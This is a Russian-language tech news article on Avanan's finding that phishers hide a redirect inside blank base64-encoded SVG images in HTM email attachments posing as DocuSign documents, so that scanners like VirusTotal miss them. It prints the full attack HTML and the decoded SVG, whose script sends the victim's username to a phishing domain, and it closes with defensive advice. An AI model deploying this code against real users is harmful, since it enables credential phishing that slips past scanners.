Хакеры вставляют вирусы в пустые изображения электронных писем

Так они обходят проверку антивируса VirusTotal.

Дмитрий Зверев

Любитель научной фантастики и технологического прогресса. Хорошо сочетает в себе заумного технаря и утончённого гуманитария. Пишет про IT и радуется этому.

Что за вирус

Исследователи из компании Avanan выяснили, что злоумышленники внедряют вредоносное ПО через пустые изображения в электронных письмах. Это позволяет им обходить проверку службы VirusTotal.

«Хакеры могут атаковать практически любых пользователей при помощи этого метода. Как и для многих атак, главная их идея — достать информацию от жертвы. Любой, у кого есть доступ к конфиденциальной информации или банковскому счёту, является потенциальной целью хакеров», — сказал Джереми Фукс, аналитик кибербезопасности из Avanan.

Как выглядит атака

Хакеры отправляют жертвам письмо с вложенным документом, который связан с сервисом управления электронными документами — DocuSign. В письме говорится, что нужно просмотреть и подписать документ.

Внешний вид письма, которое отправляют хакеры. Источник: Avanan

По ссылке пользователь переходит на страницу DocuSign, которая является подлинной. Но опасность находится во вложенном HTM-коде, отправленном вместе со ссылкой на DocuSign. В нём содержится SVG-изображение, закодированное с использованием Base64. Само изображение пустое, но внутри себя файл имеет встроенный JavaScript-код, который перенаправляет на вредоносный URL-адрес.

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <title>Title</title>
</head>

<body>
  <embed src="data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiA/PjxzdmcgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj48Y2lyY2xlPjwvY2lyY2xlPjxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij48IVtDREFUQVtwYXJlbnQud2luZG93LnBvc3RNZXNzYWdlKCJodHRwczovL2F3aW4xLmNvbS9jcmVhZC5waHA/YXdpbm1pZD0xNjMyOCZhd2luYWZmaWQ9NDIxMjI1JnVlZD1odHRwczovL25hNGRvY3VjaGVjay5uaWdodHNreS50ay8/dXNlcm5hbWU9IiwgIioiKV1dPjwvc2NyaXB0Pjwvc3ZnPg==">
  <script>
    window.addEventListener("message", (event) => {
        console.log(event)
        if (event.data)
            window.location = event.data;
    }, false);
  </script>
</body>

</html>

Декодированное изображение выглядит так:

<?xml version="1.0" ?>

<svg xmlns="http://www.w3.org/2000/svg">

  <circle></circle>

  <script type="text/javascript">
    <![CDATA[parent.window.postMessage("https://awin1.com/cread.php?awinmid=16328&awinaffid=421225&ued=https://na4docucheck.nightsky.tk/?username=<Здесь находится имя пользователя>", "*")]]>
  </script>

</svg>

Таким способом хакеры могут скрывать вредоносные URL-ссылки внутри пустых изображений, чтобы обходить сервисы проверки.

Как защитить себя

Чтобы обезопасить себя от таких атак, специалисты из сферы безопасности рекомендуют:

не доверять электронным письмам, в которых содержатся HTML- или HTM-вложения;
блокировать все сообщения с HTML-вложениями и относиться к ним так же, как к исполнительным файлам (.exe, .cab).

Читайте также: